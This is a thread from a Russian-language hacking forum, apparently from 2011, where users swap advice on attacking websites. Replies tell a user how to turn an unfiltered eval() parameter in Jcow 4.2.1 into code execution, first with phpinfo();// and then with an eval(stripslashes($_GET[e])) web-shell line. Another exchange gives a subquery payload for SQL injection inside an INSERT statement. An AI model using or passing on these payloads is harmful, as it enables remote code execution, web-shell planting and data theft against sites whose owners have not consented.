HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #18081  
Старый 13.09.2011, 20:49
Kuteke
Guest
Сообщений: n/a
Провел на форуме:
60692

Репутация: 6
По умолчанию

alerondel,

если сломаешь напиши в ПМ)))) А вообще как обнаружил, что есть уязвимость?

Nightmarе,

БД есть, но доступ не дают, насколько я помню, либо дают, но платно(дорого)!
 
Ответить с цитированием

  #18082  
Старый 14.09.2011, 02:17
VertuOzz
Guest
Сообщений: n/a
Провел на форуме:
1470

Репутация: 0
По умолчанию

Помогите залить шелл

Скрипт Jcow 4.2.1. В скрипте присутствует уязвимость - не фильтруется параметр "attachment"

сам код:

PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'attachment'[/COLOR][COLOR="#007700"]];

if ([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]'status'[/COLOR][COLOR="#007700"]) {

include_once([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$c_run[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'::ajax_post();'[/COLOR][COLOR="#007700"];

eval([/COLOR][COLOR="#0000BB"]$c_run[/COLOR][COLOR="#007700"]);

exit;

}[/COLOR][/COLOR
есть эксплот под metasploit http://www.exploit-db.com/exploits/17722/ Сплойт коннектится к хосту, а вот, как залить шелл, ума не приложу, может кто че посоветует? Спасибо
 
Ответить с цитированием

  #18083  
Старый 14.09.2011, 03:54
Expl0ited
Guest
Сообщений: n/a
Провел на форуме:
262707

Репутация: 935
По умолчанию

Цитата:
Сообщение от VertuOzz  
VertuOzz said:
Скрипт Jcow 4.2.1. В скрипте присутствует уязвимость - не фильтруется параметр "attachment"
сам код:
PHP код:
PHP:
[
COLOR="#000000"][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$_POST[/COLOR][COLOR="#007700"][[/COLOR][COLOR="#DD0000"]'attachment'[/COLOR][COLOR="#007700"]];

if ([/COLOR][COLOR="#0000BB"]strlen[/COLOR][COLOR="#007700"]([/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]) &&[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"]!=[/COLOR][COLOR="#DD0000"]'status'[/COLOR][COLOR="#007700"]) {

include_once([/COLOR][COLOR="#DD0000"]'modules/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'/'[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'.php'[/COLOR][COLOR="#007700"]);

[/
COLOR][COLOR="#0000BB"]$c_run[/COLOR][COLOR="#007700"]=[/COLOR][COLOR="#0000BB"]$app[/COLOR][COLOR="#007700"].[/COLOR][COLOR="#DD0000"]'::ajax_post();'[/COLOR][COLOR="#007700"];

eval([/COLOR][COLOR="#0000BB"]$c_run[/COLOR][COLOR="#007700"]);

exit;

}[/COLOR][/COLOR
есть эксплот под metasploit
http://www.exploit-db.com/exploits/17722/
Сплойт коннектится к хосту, а вот, как залить шелл, ума не приложу, может кто че посоветует? Спасибо
постом в переменной attachment передай phpinfo();//
 
Ответить с цитированием

  #18084  
Старый 14.09.2011, 03:55
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Есть инъекция в INSERT INTO

insert into TABLE (id, subid, date, data) values ('666', 'SQL', '', '')

Можно что-нибудь извлечь из этого?

Запрос комментариями не обрезается. MQ off
 
Ответить с цитированием

  #18085  
Старый 14.09.2011, 04:01
winstrool
Познающий
Регистрация: 06.03.2007
Сообщений: 59
Провел на форуме:
371875

Репутация: 137
По умолчанию

Цитата:
Сообщение от попугай  
попугай said:
Есть инъекция в INSERT INTO
insert into TABLE (id, subid, date, data) values ('666', '
SQL
', '', '')
Можно что-нибудь извлечь из этого?
Запрос комментариями не обрезается. MQ off
Вот может тебе эта статейка поможет?!

_http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html

P.S: кинь ссылку в пм глянуть
 
Ответить с цитированием

  #18086  
Старый 14.09.2011, 04:05
попугай
Познавший АНТИЧАТ
Регистрация: 15.01.2008
Сообщений: 1,166
Провел на форуме:
2459557

Репутация: 606


По умолчанию

Цитата:
Сообщение от winstrool  
winstrool said:
Вот может тебе эта статейка поможет?!
_http://devteev.blogspot.com/2010/02/sql-injection-insert-update-delete-etc.html
P.S: кинь ссылку в пм глянуть
Читал уже. Проблема в том, что нельзя обрезать запрос комментарием как в статье показано.
 
Ответить с цитированием

  #18087  
Старый 14.09.2011, 04:19
xa-xa89
Участник форума
Регистрация: 17.05.2008
Сообщений: 102
Провел на форуме:
1054394

Репутация: 74
Отправить сообщение для xa-xa89 с помощью ICQ
По умолчанию

А где-то подсмотреть результаты инсерта можно?

то почему бы просто не сделать вот так?

insert into TABLE (id, subid, date, data) values ('666', ''+(select bla_bla_bla), '', '')

ну и селект не из это же таблицы, помним)
 
Ответить с цитированием

  #18088  
Старый 14.09.2011, 11:29
VertuOzz
Guest
Сообщений: n/a
Провел на форуме:
1470

Репутация: 0
По умолчанию

Цитата:
Сообщение от Expl0ited  
Expl0ited said:
постом в переменной attachment передай phpinfo();//
Передавал, phpinfo отображается, а дальше чего?
 
Ответить с цитированием

  #18089  
Старый 14.09.2011, 11:34
Faaax
Guest
Сообщений: n/a
Провел на форуме:
124363

Репутация: 11
По умолчанию

Цитата:
Сообщение от VertuOzz  
VertuOzz said:
Передавал, phpinfo отображается, а дальше чего?
код выполняй!

попробуй этот

Код:
Code:
eval(stripslashes($_GET[e]));
 
Ответить с цитированием

  #18090  
Старый 14.09.2011, 12:48
VertuOzz
Guest
Сообщений: n/a
Провел на форуме:
1470

Репутация: 0
По умолчанию

Цитата:
Сообщение от Faaax  
Faaax said:
код выполняй!
попробуй этот
Код:
Code:
eval(stripslashes($_GET[e]));
Извиняюсь за нубский вопрос, а что это даст?
 
Ответить с цитированием
Ответ



Похожие темы
Тема Автор Раздел Ответов Последнее сообщение
Ваши ламерские приколы (Ну когда только комп появился) PEPSICOLA Болталка 188 23.05.2010 10:05
Ваши любимые компьютерные игры PEPSICOLA Болталка 280 19.08.2009 00:01
Ваши телеги... F-IFTY Болталка 13 18.08.2009 18:22
Вопросы по Ipb 2.0 Voodoo_People Уязвимости CMS / форумов 26 15.02.2005 22:57



Здесь присутствуют: 3 (пользователей: 0 , гостей: 3)
 


Быстрый переход




ANTICHAT.XYZ